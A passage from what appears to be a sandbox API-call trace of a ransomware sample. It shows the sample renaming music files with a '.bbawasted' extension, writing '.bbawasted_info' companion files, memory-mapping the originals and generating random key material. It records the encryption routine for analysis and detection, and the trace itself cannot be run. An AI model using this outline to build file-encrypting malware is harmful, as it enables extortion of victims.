returned 0x0 [0073.215] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.215] lstrcpyW (in: lpString1=0x5d0764, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.215] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dAOUSz.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\daousz.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dAOUSz.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\daousz.mp3.bbawasted")) returned 1 [0073.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dAOUSz.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\daousz.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.216] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0073.216] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x11f22 [0073.216] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11f22) returned 0xfe0000 [0073.216] CloseHandle (hObject=0x11c) returned 1 [0073.220] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.221] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.221] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.221] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.221] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.221] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.230] SetEndOfFile (hFile=0x120) returned 1 [0073.326] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.326] CloseHandle (hObject=0x120) returned 1 [0073.327] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0073.327] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c03e0 | out: hHeap=0x580000) returned 1 [0073.328] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.328] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.328] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.328] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dvsk34lYN1R9_.mp3") returned 57 [0073.328] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5d0700 [0073.328] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.329] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.329] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.329] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.329] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dvsk34lYN1R9_.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dvsk34lyn1r9_.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.330] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.331] SetEndOfFile (hFile=0x120) returned 1 [0073.331] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.331] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.331] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dvsk34lYN1R9_.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dvsk34lyn1r9_.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dvsk34lYN1R9_.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dvsk34lyn1r9_.mp3.bbawasted")) returned 1 [0073.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Dvsk34lYN1R9_.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dvsk34lyn1r9_.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.332] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0073.332] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x7e8d [0073.332] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e8d) returned 0x570000 [0073.332] CloseHandle (hObject=0x110) returned 1 [0073.334] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.335] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.335] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.335] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.336] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.336] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.359] SetEndOfFile (hFile=0x120) returned 1 [0073.362] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.362] CloseHandle (hObject=0x120) returned 1 [0073.366] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0073.366] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d1298 | out: hHeap=0x580000) returned 1 [0073.366] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.367] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.367] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.367] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\hfjLFKRqsWA5.wav") returned 56 [0073.367] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27a) returned 0x5d0700 [0073.367] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.367] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.367] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.368] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.368] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\hfjLFKRqsWA5.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hfjlfkrqswa5.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.674] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.675] SetEndOfFile (hFile=0x120) returned 1 [0073.675] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.675] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.675] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.675] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\hfjLFKRqsWA5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hfjlfkrqswa5.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\hfjLFKRqsWA5.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hfjlfkrqswa5.wav.bbawasted")) returned 1 [0073.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\hfjLFKRqsWA5.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hfjlfkrqswa5.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.676] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0073.676] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0xd8e1 [0073.676] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd8e1) returned 0x570000 [0073.676] CloseHandle (hObject=0x11c) returned 1 [0073.680] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.680] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.680] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.681] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.683] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.683] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.692] SetEndOfFile (hFile=0x120) returned 1 [0073.694] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.694] CloseHandle (hObject=0x120) returned 1 [0073.695] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0073.695] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d1368 | out: hHeap=0x580000) returned 1 [0073.695] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.696] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.696] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.696] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\iHG 5KVWmdSj893.mp3") returned 59 [0073.696] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x280) returned 0x5d0700 [0073.696] lstrcpyW (in: lpString1=0x5d0776, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.696] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.696] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.698] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.698] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\iHG 5KVWmdSj893.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ihg 5kvwmdsj893.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.699] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.700] SetEndOfFile (hFile=0x120) returned 1 [0073.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.700] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.700] lstrcpyW (in: lpString1=0x5d0776, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\iHG 5KVWmdSj893.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ihg 5kvwmdsj893.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\iHG 5KVWmdSj893.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ihg 5kvwmdsj893.mp3.bbawasted")) returned 1 [0073.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\iHG 5KVWmdSj893.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ihg 5kvwmdsj893.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.701] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0073.701] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x91bb [0073.701] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91bb) returned 0x570000 [0073.701] CloseHandle (hObject=0x110) returned 1 [0073.704] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.704] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.704] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.704] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.705] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.705] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.713] SetEndOfFile (hFile=0x120) returned 1 [0073.716] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.716] CloseHandle (hObject=0x120) returned 1 [0073.717] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0073.717] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d1438 | out: hHeap=0x580000) returned 1 [0073.717] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.718] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.718] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mD giaChJT6mhfQ8U0NZ.mp3") returned 64 [0073.718] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5bf070 [0073.718] lstrcpyW (in: lpString1=0x5bf0f0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.718] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.718] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.719] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.719] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mD giaChJT6mhfQ8U0NZ.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\md giachjt6mhfq8u0nz.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.719] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.720] SetEndOfFile (hFile=0x120) returned 1 [0073.720] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.720] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.720] lstrcpyW (in: lpString1=0x5bf0f0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mD giaChJT6mhfQ8U0NZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\md giachjt6mhfq8u0nz.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mD giaChJT6mhfQ8U0NZ.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\md giachjt6mhfq8u0nz.mp3.bbawasted")) returned 1 [0073.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mD giaChJT6mhfQ8U0NZ.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\md giachjt6mhfq8u0nz.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.721] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0073.721] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x2738 [0073.721] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2738) returned 0x570000 [0073.721] CloseHandle (hObject=0x11c) returned 1 [0073.726] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0073.726] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.726] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.726] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0073.727] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0073.727] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.738] SetEndOfFile (hFile=0x120) returned 1 [0073.740] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.740] CloseHandle (hObject=0x120) returned 1 [0073.745] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0073.745] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d3220 | out: hHeap=0x580000) returned 1 [0073.745] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0073.746] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0073.746] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.746] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\N5fRfes6lxtkMLTBpa.m4a") returned 62 [0073.746] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x286) returned 0x5abe80 [0073.746] lstrcpyW (in: lpString1=0x5abefc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.746] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0073.746] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0073.747] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0073.747] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\N5fRfes6lxtkMLTBpa.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\n5frfes6lxtkmltbpa.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0073.747] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0073.748] SetEndOfFile (hFile=0x120) returned 1 [0073.748] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.748] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0073.748] lstrcpyW (in: lpString1=0x5abefc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\N5fRfes6lxtkMLTBpa.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\n5frfes6lxtkmltbpa.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\N5fRfes6lxtkMLTBpa.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\n5frfes6lxtkmltbpa.m4a.bbawasted")) returned 1 [0073.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\N5fRfes6lxtkMLTBpa.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\n5frfes6lxtkmltbpa.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.749] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0073.749] GetFileSize (in: 